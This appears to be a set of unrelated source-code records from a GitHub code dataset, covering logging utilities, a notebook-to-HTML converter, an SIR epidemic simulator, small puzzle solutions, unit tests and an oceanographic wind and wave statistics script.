colored(f'{addicional_info} >> {error_type}: {error_message}', 'red', attrs = ['bold'])\n if logger:\n logger.exception(msg)\n else:\n print(f'[EXCEPTION] {msg}')\n\ndef print_error(message, logger = None):\n msg = colored(message, 'red')\n if logger:\n logger.error(msg)\n else:\n print(f'[ERROR] {msg}')\n\ndef print_info(message, logger = None, color = 'green'):\n msg = colored(message, color)\n if logger:\n logger.info(msg)\n else:\n print(f'[INFO] {msg}')\n\ndef wait_for_file(file_path, timeout = 3600, interval = 1):\n start_time = time.time()\n while not os.path.exists(file_path):\n if time.time() - start_time > timeout:\n raise TimeoutError(f'File {file_path} Not Found After Timeout')\n time.sleep(interval)\n\ndef load_csv_file(file_path, cols = list()):\n if os.path.exists(file_path):\n if cols:\n df = pd.read_csv(file_path, header = None, names = cols)\n else:\n df = pd.read_csv(file_path)\n return df\n return pd.DataFrame()\n\ndef load_file(file_path):\n with open(file_path, 'r') as text_file:\n lines = text_file.readlines()\n lines = [line.rstrip('\\n') for line in lines]\n return lines\n\ndef epoch_to_human_date(epoch_time):\n date = datetime.datetime.fromtimestamp(epoch_time)\n human_readable_date = date.strftime('%Y-%m-%d %H:%M:%S')\n return human_readable_date\n\ndef save_as_json(data, json_file):\n with open(str(json_file), 'w') as fp:\n json.dump(data, fp, indent = 4)\n","repo_name":"Malware-Hunter/SF23-AMGenerator","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15216588801","text":"#!/usr/bin/env python\nfrom __future__ import print_function, absolute_import\n\nDESCRIP = 'Evalaute, write html for `.ipynb` notebook file'\nEPILOG = \\\n\"\"\"\nOpens given NBFILE as notebook. 
Evaluates, writing output notebook to OUTDIR.\nWrites HTML to OUTDIR.\n\"\"\"\nfrom os.path import join as pjoin, splitext, isdir, split as psplit\n\nimport io\n\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\n\n# IPython before and after the big split\ntry:\n from nbformat import read as nb_read, write as nb_write, convert as nb_convert\nexcept ImportError:\n from IPython.nbformat import read as nb_read, write as nb_write, convert as nb_convert\ntry:\n from nbconvert import html\nexcept ImportError:\n from IPython.nbconvert import html\n\nfrom runipy.notebook_runner import NotebookRunner\n\nDEFAULT_TEMPLATE = 'perrinate.tpl'\nDEFAULT_READ_FORMAT = 3\nDEFAULT_WRITE_FORMAT = 3\nHTML_FORMAT = 4\n\n\ndef evaluate_notebook(nb, working_dir=None):\n # Create evaluated version and save it to the dest path.\n nb_runner = NotebookRunner(nb=nb, working_dir=working_dir)\n nb_runner.run_notebook()\n return nb_runner.nb\n\n\ndef nb_to_html(nb, template_name=DEFAULT_TEMPLATE, resources=None):\n \"\"\"convert notebook to html\n \"\"\"\n exporter = html.HTMLExporter(template_file=template_name)\n full_resources = dict(metadata = nb.metadata)\n if resources is not None:\n full_resources.update(resources)\n output, resources = exporter.from_notebook_node(\n nb, resources=full_resources)\n return output\n\n\ndef main():\n parser = ArgumentParser(description=DESCRIP,\n epilog=EPILOG,\n formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument('nbfile', type=str,\n help='notebook file')\n parser.add_argument('outdir', type=str,\n help='directory to output files')\n parser.add_argument('--template', type=str,\n default=DEFAULT_TEMPLATE,\n help='html template name')\n args = parser.parse_args()\n if not isdir(args.outdir):\n raise RuntimeError('{} is not a directory'.format(args.outdir))\n write_ipynb(args.nbfile, args.outdir, template_name=args.template)\n\n\ndef write_ipynb(nb_path, out_dir, template_name=DEFAULT_TEMPLATE):\n fpath, fname = psplit(nb_path)\n froot, ext = splitext(fname)\n with io.open(nb_path, 'rt') as f:\n nb = nb_read(f, DEFAULT_READ_FORMAT)\n nb.metadata['name'] = froot\n nb_evaluated = evaluate_notebook(nb, working_dir=fpath)\n with io.open(pjoin(out_dir, fname), 'wt') as f:\n nb_write(nb, f, DEFAULT_WRITE_FORMAT)\n nb_html = nb_to_html(nb_convert(nb_evaluated, HTML_FORMAT),\n template_name=template_name,\n resources=dict(nb_fname=fname))\n with io.open(pjoin(out_dir, froot + '.html'), 'wb') as f:\n f.write(nb_html.encode('utf-8'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"matthew-brett/perrin-academy","sub_path":"tools/write_ipynb.py","file_name":"write_ipynb.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6050112378","text":"from test.utils import with_random, BaseTest\nimport tri_image.utils as utils\n\n\n#######################################################################\ndef slow(f):\n f.slow = True\n return f\n\n\n#######################################################################\nclass TestEvolver(BaseTest):\n ###################################################################\n def test_constructor(self):\n self.get_evolver()\n\n ###################################################################\n @with_random\n def test_randomlyMoveTriangle(self):\n e = self.get_evolver()\n tri = utils.create_random_triangles(e.size, 1, utils.RGB)[0]\n self.assertEqual(tri.coordinates, [1, 2, 3, 4, 5, 6])\n e.randomly_move_triangle(tri, 
variance=20)\n\n # the triangle should now have had the center of the triangle\n # moved by some amount, limited to be between -variance, +variance\n self.assertEqual(tri.coordinates, [12, 14, 14, 16, 16, 18])\n","repo_name":"tobynance/tri_image","sub_path":"test/test_evolver.py","file_name":"test_evolver.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14081161246","text":"\"\"\"\nImplements class containing the stochastic simulation logic outlined in the\nfollowing doc: \nhttps://docs.google.com/document/d/18wv_2vcH9tKx1OJ0PpJoI8QZMTSutzX9f44mNKgVS1g/edit#\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n\nclass SIRStochasticSimulation:\n def __init__(self, params):\n\n # Meta-parameters governing the maximum number of days an\n # individual spends in each 'infection' state\n self.max_time_ID = params[\"max_time_ID\"]\n\n # parameters governing distribution over time spent in each\n # of these infection states:\n # Assumptions about the sample_X_times variables:\n # sample_X_times(n) returns a numpy array times of length max_time_X\n # such that times[k] is the number of people who stay in state X\n # for k time periods, and sum(times) == n.\n self.sample_ID_times = params[\"ID_time_function\"]\n\n # assumption: sample_QI_exit_count(n) returns a number m <= n\n # indicating the number of people in the state QI\n # who exit quarantine, given than n people initially\n # start there\n self.sample_QI_exit_count = params[\"sample_QI_exit_function\"]\n self.sample_QS_exit_count = params[\"sample_QS_exit_function\"]\n\n # parameters governing distribution over transition out of\n # each infection state\n self.exposed_infection_p = params[\"exposed_infection_p\"]\n self.contacts_lambda = params[\"expected_contacts_per_day\"]\n\n # parameters governing test protocol\n self.days_between_tests = params[\"days_between_tests\"]\n self.test_pop_fraction = params[\"test_population_fraction\"]\n self.test_QFNR = params[\"test_protocol_QFNR\"]\n self.test_QFPR = params[\"test_protocol_QFPR\"]\n\n # parameters governing contact tracing\n self.perform_contact_tracing = params[\"perform_contact_tracing\"]\n self.contact_tracing_c = params[\"contact_tracing_constant\"]\n\n # flag governing meaning of the pre-ID state\n\n # parameters governing initial state of simulation\n self.pop_size = params[\"population_size\"]\n self.init_ID_count = params[\"initial_ID_count\"]\n\n self.init_S_count = self.pop_size - self.init_ID_count\n assert self.init_S_count >= 0\n\n # instantiate state variables and relevant simulation variables\n self.reset_initial_state()\n\n def reset_initial_state(self):\n self.S = self.init_S_count\n self.ID = self.sample_ID_times(self.init_ID_count)\n self.QS = 0\n self.QI = 0\n self.R = 0\n\n var_labels = self.get_state_vector_labels()\n self.sim_df = pd.DataFrame(columns=var_labels)\n self._append_sim_df()\n self.current_day = 0\n self.last_test_day = -1\n\n def run_new_trajectory(self, T):\n self.reset_initial_state()\n for _ in range(T):\n self.step()\n return self.sim_df\n\n def run_contact_trace(self, new_QI):\n raise (Exception(\"not supported\"))\n leave_E = min(sum(self.E), new_QI * self.contact_tracing_c)\n new_QI = int(self.exposed_infection_p * leave_E)\n new_QS = leave_E - new_QI\n self.QS = self.QS + new_QS\n self.QI = self.QI + new_QI\n\n idx = self.max_time_E - 1\n while leave_E > 0:\n leave_E_idx = min(self.E[idx], leave_E)\n self.E[idx] -= leave_E_idx\n leave_E -= 
leave_E_idx\n idx -= 1\n\n def run_test(self):\n \"\"\" execute one step of the testing logic \"\"\"\n # infectious_test_pop = free_infectious * self.test_pop_fraction\n # fluid_new_QI = infectious_test_pop * (1 - self.test_QFNR)\n\n # the probability that a free infected individual is quarantined\n # on this round of testing\n new_QI_p = self.test_pop_fraction * (1 - self.test_QFNR)\n\n # sample the number of free infected people who end up quarantined\n # first from the exposed state -- multiply by exposed_infection_p to account for uncertain\n # nature of infection status in the E group\n new_QI_from_ID = np.random.binomial(self.ID, new_QI_p)\n\n # probability a free-susceptible person becomes quarantined\n new_QS_p = self.test_pop_fraction * self.test_QFPR\n # sample number of free susceptible people who become quarantined\n new_QS_from_S = np.random.binomial(self.S, new_QS_p)\n\n self.ID = self.ID - new_QI_from_ID\n self.S = self.S - new_QS_from_S\n\n new_QI = sum(new_QI_from_ID)\n self.QI = self.QI + new_QI\n\n new_QS = new_QS_from_S\n self.QS = self.QS + new_QS\n\n if self.perform_contact_tracing:\n self.run_contact_trace(new_QI)\n\n def step(self):\n \"\"\" simulate a single day in the progression of the disease \"\"\"\n\n # do testing logic first\n if (\n self.current_day - self.last_test_day >= self.days_between_tests\n or self.last_test_day == -1\n ):\n self.last_test_day = self.current_day\n self.run_test()\n\n free_infectious = 0\n free_infectious += sum(self.ID)\n # free_infectious += sum(self.E) * self.exposed_infection_p\n\n free_susceptible = self.S\n\n # simulate new exposures between free infectious & free susceptible:\n free_tot = free_infectious + free_susceptible + self.R\n\n poisson_param = (\n free_infectious * self.contacts_lambda * free_susceptible / free_tot\n )\n\n n_contacts = min(np.random.poisson(poisson_param), self.S)\n new_ID = np.random.binomial(n_contacts, self.exposed_infection_p)\n\n # resolve ID queue\n new_R = self.ID[0]\n\n # sample number of people who leave quarantine\n leave_QI = self.sample_QI_exit_count(self.QI)\n new_R += leave_QI\n\n new_S = self.sample_QS_exit_count(self.QS)\n\n # update relevant state variables:\n self.S = self.S + new_S - new_ID\n self.R += new_R\n\n self.QI -= leave_QI\n self.QS -= new_S\n\n # update array-based state variables\n self._shift_array_state_variables()\n self.ID = self.ID + self.sample_ID_times(new_ID)\n\n self._append_sim_df()\n\n self.current_day += 1\n\n def _append_sim_df(self):\n data = self.get_current_state_vector()\n labels = self.get_state_vector_labels()\n new_row_df = pd.DataFrame([data], columns=labels)\n self.sim_df = self.sim_df.append(new_row_df, ignore_index=True)\n if sum(data) != self.pop_size:\n raise (Exception(\"population has shrunk\"))\n\n def _shift_array_state_variables(self):\n idx = 0\n while idx <= self.max_time_ID - 2:\n self.ID[idx] = self.ID[idx + 1]\n idx += 1\n self.ID[self.max_time_ID - 1] = 0\n\n def get_current_state_vector(self):\n return np.concatenate([[self.S], [self.QS], [self.QI], [self.R], self.ID])\n\n def get_state_vector_labels(self):\n return [\"S\", \"QS\", \"QI\", \"R\"] + [\n \"ID_{}\".format(x) for x in range(self.max_time_ID)\n ]\n","repo_name":"saitcakmak/BoRisk","sub_path":"BoRisk/test_functions/covid_simulators/sir_stochastic_sim.py","file_name":"sir_stochastic_sim.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"10508308625","text":"import 
re\n\nwith open(\"day2.input\") as f:\n data = f.readlines()\n\n# \"7-10 m: qmpgmmsmmmmkmmkj\"\npat = re.compile(\"^([0-9]+)-([0-9]+) (\\S): (.*)$\")\n\n# Part 1\nvalid_count = 0\nfor line in data:\n m = pat.match(line)\n if not m:\n raise Exception(\"Bad match\", line)\n occurrences = m.group(4).count(m.group(3))\n if int(m.group(1)) <= occurrences <= int(m.group(2)):\n valid_count += 1\nprint(valid_count)\n\n# Part 2\nvalid_count = 0\nfor line in data:\n m = pat.match(line)\n if not m:\n raise Exception(\"Bad match\", line)\n p1, p2, ch, pw = int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)\n if (pw[p1 - 1] == ch) != (pw[p2 - 1] == ch):\n valid_count += 1\nprint(valid_count)\n","repo_name":"Jemgoss/adventofcode","sub_path":"2020/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21034052744","text":"from setuptools import setup\nimport subprocess\nfrom typing import List\n\n\ndef find_version(filename: str = \"version\") -> str:\n \"\"\"Parse the version and build details stored in the 'version' file.\"\"\"\n try:\n cmd: List[str] = [\"git\", \"describe\", \"--tags\", \"--always\", \"HEAD\"]\n gitversion: str = subprocess.check_output(\n cmd, stderr=subprocess.DEVNULL\n ).decode().strip()\n build: List[str] = gitversion.split(\"-\")\n # -- (e.g. 0.2-8-adfebee)\n if len(build) > 1:\n return \"{}.post{}\".format(build[0], build[1])\n\n # tagged commit\n return gitversion\n except subprocess.CalledProcessError:\n # If .git does not exist, default to an old dev version\n return \"0.1.dev0\"\n\n\nsetup(version=find_version())\n","repo_name":"rgildein/juju-verify","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"33562205802","text":"# https://www.codechef.com/AUG20B/problems/CRDGAME3\n\ntest = int(input())\n\ndef ceil(n):\n if(n > int(n)):\n return int(n) + 1\n return int(n)\n\nfor _ in range(test):\n ab = input().split()\n a = int(ab[0])/9\n b = int(ab[1])/9\n\n a = ceil(a)\n b = ceil(b)\n\n if(a < b):\n print(\"0\",a)\n else:\n print(\"1\",b)\n","repo_name":"NikithKS/Days-of-Coding","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9091832568","text":"import pytest\n\nfrom app import db, create_app\nfrom tests.utils import register, login\nfrom app.controllers import populate_db_by_test_data, bid_generation\n\n\n@pytest.fixture\ndef client():\n app = create_app(environment=\"testing\")\n app.config[\"TESTING\"] = True\n\n with app.test_client() as client:\n app_ctx = app.app_context()\n app_ctx.push()\n db.drop_all()\n db.create_all()\n populate_db_by_test_data()\n bid_generation()\n register(\"sam\")\n login(client, \"sam\")\n yield client\n db.session.remove()\n db.drop_all()\n app_ctx.pop()\n\n\ndef test_edited_bids(client):\n response = client.post(\"/archive_or_export\", data={'1': 'on', '2': 'on'}, follow_redirects=True)\n assert response.status_code == 200\n assert b'Archived' in response.data\n\n\ndef test_biddings(client):\n response = client.get(\"/biddings\")\n assert response.status_code == 200\n assert b\"Client\" in 
response.data\n","repo_name":"Simple2B/flora","sub_path":"tests/test_biddings.py","file_name":"test_biddings.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32878329797","text":"\n\ndef find_three_words(text: str):\n\n def symbols_of_ascii():\n '''\n Return list of ASCII characters in the ranges\n 33 - 47 | 58 - 64 | 91 - 96 | 123 - 126\n '.', ',', ':', '!', '\"', \"'\", '[', ']', '-', '(', ')', etc.\n '''\n list = []\n list.extend([chr(i) for i in range(33, 48)])\n list.extend([chr(i) for i in range(58, 65)])\n list.extend([chr(i) for i in range(91, 97)])\n list.extend([chr(i) for i in range(123, 127)])\n return list\n\n lst_no = symbols_of_ascii()\n lst = []\n\n for word in text.lower().split():\n if not word in lst_no:\n _word = word\n if word[-1] in lst_no:\n _word = _word[:-1]\n if word[0] in lst_no:\n _word = _word[1:]\n lst.append(_word)\n\n if len(lst) < 3:\n return []\n\n _dict = dict()\n for word in lst:\n _dict[word] = _dict.get(word, 0) + 1\n\n _list = []\n for key, value in _dict.items():\n _list.append((value, key))\n _list.sort(reverse=True)\n\n result = []\n for freq, word in _list[0:3]:\n result.append(word)\n\n return result\n\n\ntext = input('Type your text: ')\nprint(find_three_words(text))\n","repo_name":"Roninon/Test-Task","sub_path":"find-three-words.py","file_name":"find-three-words.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72526788627","text":"import unittest\nfrom mock import Mock\nimport yangvoodoo\nimport subprocess\nimport time\nimport yangvoodoo.sysrepodal\n\n\nclass test_sysrepodal(unittest.TestCase):\n def setUp(self):\n self.subject = yangvoodoo.sysrepodal.SysrepoDataAbstractionLayer()\n self.subject.session = Mock()\n\n def test_handle_error_no_subscribers(self):\n error_mock = Mock()\n error_mock.xpath.return_value = \"/path\"\n error_mock.message.return_value = \"The node is not enabled in running datastore\"\n errors_mock = Mock()\n errors_mock.error_cnt.return_value = 1\n errors_mock.error.return_value = error_mock\n self.subject.session.get_last_errors = Mock(return_value=errors_mock)\n\n with self.assertRaises(\n yangvoodoo.Errors.SubscriberNotEnabledOnBackendDatastore\n ) as context:\n self.subject._handle_error(\"/path\", \"err\")\n self.assertEqual(\n str(context.exception),\n \"There is no subscriber connected able to process data for the following path.\\n /path\",\n )\n\n def test_handle_error_no_other_backend_error(self):\n error_mock = Mock()\n error_mock.xpath.return_value = \"/path\"\n error_mock.message.return_value = \"Someother stuff went wrong\"\n errors_mock = Mock()\n errors_mock.error_cnt.return_value = 1\n errors_mock.error.return_value = error_mock\n self.subject.session.get_last_errors = Mock(return_value=errors_mock)\n\n with self.assertRaises(yangvoodoo.Errors.BackendDatastoreError) as context:\n self.subject._handle_error(\"/path\", \"err\")\n self.assertEqual(\n str(context.exception),\n \"1 Errors occured\\nError 0: Someother stuff went wrong (Path: /path)\\n\",\n )\n","repo_name":"anter74/python-yang-voodoo","sub_path":"test/integration/test_sysrepodal.py","file_name":"test_sysrepodal.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27204382812","text":"import unittest\n\nimport gym\nimport numpy as 
np\nimport tensorflow as tf\n\nfrom angorapy.common.policies import BetaPolicyDistribution\nfrom angorapy.models import get_model_builder\nfrom angorapy.utilities.model_utils import reset_states_masked, build_sub_model_from, get_layers_by_names\n\n\nclass UtilTest(unittest.TestCase):\n\n def test_masked_state_reset(self):\n model = tf.keras.Sequential((\n tf.keras.layers.Dense(2, batch_input_shape=(7, None, 2)),\n tf.keras.layers.LSTM(5, stateful=True, name=\"larry\", return_sequences=True),\n tf.keras.layers.LSTM(5, stateful=True, name=\"harry\"))\n )\n\n l_layer = model.get_layer(\"larry\")\n h_layer = model.get_layer(\"harry\")\n l_layer.reset_states([s.numpy() + 9 for s in l_layer.states])\n h_layer.reset_states([s.numpy() + 9 for s in h_layer.states])\n reset_states_masked(model, [True, False, False, True, False, False, True])\n\n self.assertTrue(np.allclose([s.numpy() for s in model.get_layer(\"larry\").states],\n [s.numpy() for s in model.get_layer(\"harry\").states]))\n self.assertTrue(np.allclose([s.numpy() for s in model.get_layer(\"larry\").states], [\n [0, 0, 0, 0, 0],\n [9, 9, 9, 9, 9],\n [9, 9, 9, 9, 9],\n [0, 0, 0, 0, 0],\n [9, 9, 9, 9, 9],\n [9, 9, 9, 9, 9],\n [0, 0, 0, 0, 0],\n ]))\n\n # def test_submodeling_from(self):\n # env = gym.make(\"LunarLanderContinuous-v2\")\n # full_model, _, _ = get_model_builder(\"simple\", \"gru\", shared=False)(env, BetaPolicyDistribution(env))\n # sub_model_from_a = build_sub_model_from(full_model, \"beta_action_head\")\n # sub_model_from_b = build_sub_model_from(full_model, \"policy_recurrent_layer\")\n #\n # for sub_model_from in [sub_model_from_a, sub_model_from_b]:\n # layer = get_layers_by_names(sub_model_from, [\"beta_action_head\"])[0]\n #\n # input_shape_raw = layer.get_input_shape_at(1)\n # input_shape_replaced = tuple(v if v is not None else 1 for v in input_shape_raw)\n #\n # out = sub_model_from(tf.random.normal(input_shape_replaced))","repo_name":"ccnmaastricht/angorapy","sub_path":"tests/test_model_utils.py","file_name":"test_model_utils.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"38914235263","text":"import requests\nimport urllib\n\nsession = requests.Session()\nsession.max_redirects = 10000\nrequest = session.get(\"http://localhost\")\n\nchars = \"\"\nfor response in request.history:\n chars += urllib.parse.unquote(response.url.split(\"=\")[-1])\n\nprint(chars)\n\n# Take base64 and decode it for the flag\n","repo_name":"wmgcyber/intakectf-2021-public","sub_path":"Miscellaneous/redirects/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10656915065","text":"import copy\nimport matplotlib.pyplot as plt\nimport parameters_MF_MB as PRM\nimport figures_final as GRAPH\nimport matplotlib_latex_bridge as mlb\n\nmlb.setup_page(textwidth=6.97522, columnwidth=3.36305, fontsize=10)\n\n\ndef main():\n\n\t##################################################\n\t# LEARNING PLOT AND VIOLIN STATISTICAL ANALYSIS FIGURE ##########################\n\tparams = copy.deepcopy(PRM.params)\n\tparams['replay_refs'] = [0,1,2,4]\n\tfig_det = GRAPH.figure_learning_curves_violin_plots(det=True, params=params, thres=0.05)\n\tfig_nondet = GRAPH.figure_learning_curves_violin_plots(det=False, params=params, thres=0.05)\n\tfig_det.savefig(\"Saved_figures/learning_plots_det_1200.jpg\", format='jpg', 
dpi=1200)\n\tfig_nondet.savefig(\"Saved_figures/learning_plots_nodet_1200.jpg\", format='jpg', dpi=1200)\n\t# plt.show()\n\n\t##################################################\n\n\t# # Q-VALUES AND REPLAYS ANALYSIS FIGURE ##########################\n\tparams = copy.deepcopy(PRM.params)\n\tparams['replay_refs'] = [0,1,2,4]\n\tfig_det = GRAPH.figure_Qvalues(det=True, params=params, legends=False)\n\tfig_nondet = GRAPH.figure_Qvalues(det=False, params=params, legends=True)\n\tfig_det.savefig(\"Saved_figures/qvalues_det.pdf\")\n\tfig_nondet.savefig(\"Saved_figures/qvalues_nodet.jpg\", format='jpg', dpi=300)\n\t# plt.show()\n\nif __name__ == '__main__':\n\tmain()\n\n","repo_name":"esther-poniatowski/Massi2022","sub_path":"data+code_2generate_the_paper_figures/learning_performance_figure/figure_learning_and_qvalues.py","file_name":"figure_learning_and_qvalues.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13955930982","text":"'''\nA pangram is a string that contains every letter of the alphabet. Given a sentence determine whether it is a pangram in the English alphabet. Ignore case. Return either pangram or not pangram as appropriate.\n'''\n\ndef pangrams(s):\n alphabet = {\n 'a': 0,\n 'b': 0,\n 'c': 0,\n 'd': 0,\n 'e': 0,\n 'f': 0,\n 'g': 0,\n 'h': 0,\n 'i': 0,\n 'j': 0,\n 'k': 0,\n 'l': 0,\n 'm': 0,\n 'n': 0,\n 'o': 0,\n 'p': 0,\n 'q': 0,\n 'r': 0,\n 's': 0,\n 't': 0,\n 'u': 0,\n 'v': 0,\n 'w': 0,\n 'x': 0,\n 'y': 0,\n 'z': 0\n }\n s = s.lower()\n split = [*s]\n for letter in split:\n if letter in alphabet:\n alphabet[letter] += 1\n\n print(alphabet)\n counts = alphabet.values()\n if 0 in counts:\n print('not pangram')\n return 'not pangram'\n else: \n print('pangram')\n return 'pangram'\n\npangrams('We promptly judged antique ivory buckles for the next prize')\npangrams('We promptly judged antique ivory buckles for the prize')","repo_name":"scottydphillips/hackerRankPracticeAlgos","sub_path":"python/pangrams.py","file_name":"pangrams.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22116255884","text":"'''\n\n Rotina que lê o banco de dados das UCDS de referência de cada bacia\n e plota gráficos de barra com limites de \"atenção\" e \"alerta\", assim como\n gera tabela excel com estas informações.\n\n Autor: Francisco Thiago Franca Parente (BHYK)\n Criação: 11/03/2020\n\n Edições:\n + 27/08/2020:\n Modificado o gráfico dos últimos dois anos. Foi acrescentado dois\n xticks aos gráfico. 
Um referente à média ponderada entre janeiro e\n o mês de interesse e outro com o percentual anual do ano anterior.\n\n Ainda, foi adicionado ao código uma nova forma de exportar os\n resultados já exatamente como exposto na tabela do relatório.\n\n'''\n\n# _____________________________________________________________________________\n# Modificar aqui\n# _____________________________________________________________________________\nimport os\n# Diretório onde serão salvos os outputs\nPATH = os.path.normpath(\"XXXXXXXXXXXXXXXX\")\n\n# Intervalo de data para busca no banco de dados\nDATEMIN = u\"01/01/2010 00:00:00\"\nDATEMAX = u\"31/01/2022 23:00:00\"\n\n# Bacias de interesse\nBACIAS = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\n# Definindo os limites de atenção e alerta de vento e onda\nwind_lim = [20., 28.]\nwave_lim = [1.5, 2., 2.5]\n\n# NÚMERO do mês de interesse (1 -jan, 2-fev, ...)\nm_interesse = [1]\n\n# Unidade de medida para vento\nunidademedida = 'nós'\n\n# _____________________________________________________________________________\n\nfrom warnings import filterwarnings\n# Desativação de alertas minimizando mensagens no console\nfilterwarnings(\"ignore\")\n\nfrom sys import path\nfrom datetime import timedelta\nfrom datetime import datetime as dt\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport matplotlib.patheffects as PathEffects\nimport time\npth1 = 'XXXXXXXXXXXXXXX'\ndirs = ['data', 'math', 'settings', 'graph']\nfor d in dirs:\n pth2 = pth1 + d\n path.append(pth2)\n\nimport definitions as mopdef\nimport statistic as stc\nimport OCNdb as ocn\nimport histograma as htg\nfrom calendar import monthrange\n# _____________________________________________________________________________\n\n# Variável de escrita excel\nwave_writer = pd.ExcelWriter(PATH + '\\\\wave_todas_bacias.xlsx')\nwind_writer = pd.ExcelWriter(PATH + '\\\\wind_todas_bacias.xlsx')\n\n# Labels dos meses do ano\nMNTHLBL = ('Jan', 'Fev', 'Mar', 'Abr', 'Mai', 'Jun',\n 'Jul', 'Ago', 'Set', 'Out', 'Nov', 'Dez')\n\n# datetime para reindexação\ndti = dt.strptime(DATEMIN, '%d/%m/%Y %H:%M:%S')\ndtf = dt.strptime(DATEMAX, '%d/%m/%Y %H:%M:%S')\n\n# Carregando quais são as unidades unidades representativas das bacias\nUCDS = mopdef.get_ucds_bacias()\n\n# Verificando os anos que serão avaliados\n# ano atual\nYEAR = int(DATEMAX[6:10])\n\nstart = time.time()\n_wind, _wave = pd.DataFrame(), pd.DataFrame()\nfor bx, bacia in enumerate(BACIAS):\n # Pegando as ucds de referência de cada bacia\n ucds_wind = list(filter(None,\n [item for ucd in UCDS.loc[bacia].VENTO.values\n for item in ucd]))\n ucds_wave = list(filter(None,\n [item for ucd in UCDS.loc[bacia].ONDA.values\n for item in ucd]))\n # Lendo dados do banco\n crono = time.time()\n print(\"{} // {}\".format('Lendo vento de', bacia))\n wind = ocn.get_BDs(ucds_wind, [DATEMIN, DATEMAX], 'meteo')\n print(\"{} // {:.2f} min\".format(\n 'Tempo de leitura do vento',\n (time.time() - crono) / 60))\n print(\"{} // {}\".format('Lendo onda de', bacia))\n crono = time.time()\n wave = ocn.get_BDs(ucds_wave, [DATEMIN, DATEMAX], 'wave')\n print(\"{} // {}\".format('Finalizada consulta de dados de', bacia))\n print(\"{} // {:.2f} min\".format(\n 'Tempo de leitura do onda',\n (time.time() - crono) / 60))\n # Verificando unidade de medidia\n if unidademedida == 'nós':\n wind.WSPD = wind.WSPD * 1.94384449\n\n # # Plotando para verificação da série que será analisada\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # 
wind.groupby(level=[2]).median().WSPD.plot(ax=ax)\n # ax.set_title(\"Vento {}\".format(bacia))\n # fig.savefig(\n # '{}\\\\Vento_{}.png'.format(PATH, bacia),\n # format='png',\n # bbox_inches='tight',\n # dpi=600)\n\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # wave.groupby(level=[2]).median().VAVH.plot(ax=ax)\n # ax.set_title(\"Onda {}\".format(bacia))\n # fig.savefig(\n # '{}\\\\Onda_{}.png'.format(PATH, bacia),\n # format='png',\n # bbox_inches='tight',\n # dpi=600)\n\n # Calculando percentual de dados.\n p_wind = stc.percentual(\n wind.groupby(level=[2]).median().WSPD,\n wind_lim,\n '.1f',\n 'Int.',\n atype='anual')\n p_wave = stc.percentual(\n wave.groupby(level=[2]).median().VAVH,\n wave_lim,\n '.1f',\n 'Hs',\n atype='anual')\n _wind = _wind.append(pd.concat([p_wind], keys=[bacia], names=['Bacia']))\n _wave = _wave.append(pd.concat([p_wave], keys=[bacia], names=['Bacia']))\n print('[{}: Ok]'.format(bacia))\n\n_wind.to_excel(wind_writer)\n_wave.to_excel(wave_writer)\nwind_writer.close()\nwave_writer.close()\n\nprint(\"{} // {:.2f} min\".format(\n 'Tempo Total de leitura dos dados',\n (time.time() - start) / 60))\n# _____________________________________________________________________________\n# Plotando\n# _____________________________________________________________________________\n\nwidth = .45\n\n# PLOTA DADO DE TODOS OS ANOS DO MÊS DE INTERESSE\nfor name, param in zip(['wind', 'wave'], [_wind, _wave]):\n for m in m_interesse:\n fig = plt.figure(figsize=(12, 9))\n\n ordem = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\n for splt, bc in enumerate(ordem):\n\n xlbl = [str(x) for x in param.index.levels[1]]\n xtik = np.arange(0, len(xlbl), 1)\n\n if param.loc[bc].xs(MNTHLBL[m - 1], level=1).shape[0] != len(xlbl):\n ckdata = param.loc[bc].xs(MNTHLBL[m - 1], level=1)\n for ey in xlbl:\n if int(ey) not in ckdata.index:\n ckdata = ckdata.append(\n pd.DataFrame(\n data=[],\n 